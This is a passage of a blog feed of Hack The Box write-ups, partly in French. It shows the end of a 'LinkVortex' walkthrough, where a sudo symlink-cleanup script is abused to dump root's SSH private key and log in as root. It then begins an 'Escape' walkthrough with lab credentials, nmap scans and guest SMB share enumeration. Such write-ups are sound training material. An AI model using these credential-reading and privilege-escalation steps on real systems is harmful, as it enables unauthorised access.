sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png </span></span><span class="line"><span class="cl">Link found <span class="o">[</span> exploit.png <span class="o">]</span> , moving it to quarantine </span></span><span class="line"><span class="cl">/usr/bin/mv: <span class="s1">&#39;exploit.png&#39;</span> and <span class="s1">&#39;/var/quarantined/exploit.png&#39;</span> are the same file </span></span><span class="line"><span class="cl">Content: </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn </span></span><span class="line"><span class="cl">NhAAAAAwEAAQAAAYEAmpHVhV11MW7eGt9WeJ23rVuqlWnMpF+FclWYwp4SACcAilZdOF8T </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">xmo6eXMvU90HVbakUoRspYWISr51uVEvIDuNcZUJlseINXimZkrkD40QTMrYJc9slj9wkA </span></span><span class="line"><span class="cl"><span class="nv">ICLgLxRR4sAx0AAAAPcm9vdEBsaW5rdm9ydGV4AQIDBA</span><span class="o">==</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># -------------------------------</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ vim root.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> root.key </span></span><span class="line"><span class="cl">$ ssh -i root.key root@10.10.11.47 </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.5 LTS <span class="o">(</span>GNU/Linux 6.5.0-27-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Mon Dec <span class="m">2</span> 11:20:43 <span class="m">2024</span> from 10.10.14.61 </span></span><span class="line"><span class="cl">-bash: warning: setlocale: LC_ALL: cannot change locale <span class="o">(</span>en_US.UTF-8<span class="o">)</span> </span></span><span class="line"><span class="cl">root@linkvortex:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@linkvortex:~# cat root.txt </span></span><span class="line"><span class="cl">5f3e.....ebc9 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/escape-htb/Wed, 10 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/escape-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Escape cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Escape</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.202</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># SQL Server</span> </span></span><span class="line"><span class="cl">PublicUser : GuestUserCantWrite1 </span></span><span class="line"><span class="cl">sql_svc : REGGIE1234ronnie </span></span><span class="line"><span class="cl">Ryan.cooper : NuclearMosquito3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.202 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-10 22:21:01Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s syn-ack ttl <span class="m">127</span> Microsoft SQL Server <span class="m">2019</span> 15.00.2000.00<span class="p">;</span> RTM </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2025-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2055-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 8f5d163bc1ef9dbb2b789cdf2d7b5a90 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 6c89bf0840566f823a006405fce65a4f0570de19 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIDADCCAeigAwIBAgIQfAGJqsgHZopA2ARCvdHiZTANBgkqhkiG9w0BAQsFADA7 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">JfvGOQ</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-ntlm-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49687/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49688/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49706/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49709/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-09-10T22:21:54 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 63970/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">2</span> <span class="o">(</span>port 24393/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 50586/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 24268/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 311: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-share-enumeration---guest">SMB Share ENumeration - guest </h3><p>A l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong> et sans mot de passe, on réussi à lister les SMB SHARES. Le share <strong>Public</strong> est accessible en lecture.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span></code></pre></td></tr></table> </div> </div><h3 id="public-share---sql-server-procedurespdf">Public Share - &ldquo;SQL Server Procedures.pdf&rdquo; </h3><p>On trouve un fichier &ldquo;SQL Server Procedures.pdf&rdquo; dans le share <strong>Public</strong> à l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong>. J&rsquo;utilise ici uniquement <strong>nxc</strong> pour extraire le fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -M spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Started module spidering_plus with the following options: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> DOWNLOAD_FLAG: False </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> STATS_FLAG: True </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_FILTER: <span class="o">[</span><span class="s1">&#39;print$&#39;</span>, <span class="s1">&#39;ipc$&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_EXTS: <span class="o">[</span><span class="s1">&#39;ico&#39;</span>, <span class="s1">&#39;lnk&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> MAX_FILE_SIZE: <span class="m">50</span> KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> Saved share-file metadata to <span class="s2">&#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.202.json&#34;</span>. </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Shares: <span class="m">6</span> <span class="o">(</span>ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Readable Shares: <span class="m">2</span> <span class="o">(</span>IPC$, Public<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Filtered Shares: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total folders found: <span class="m">0</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total files found: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size average: 48.39 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size min: 48.39 KB </span></span><span 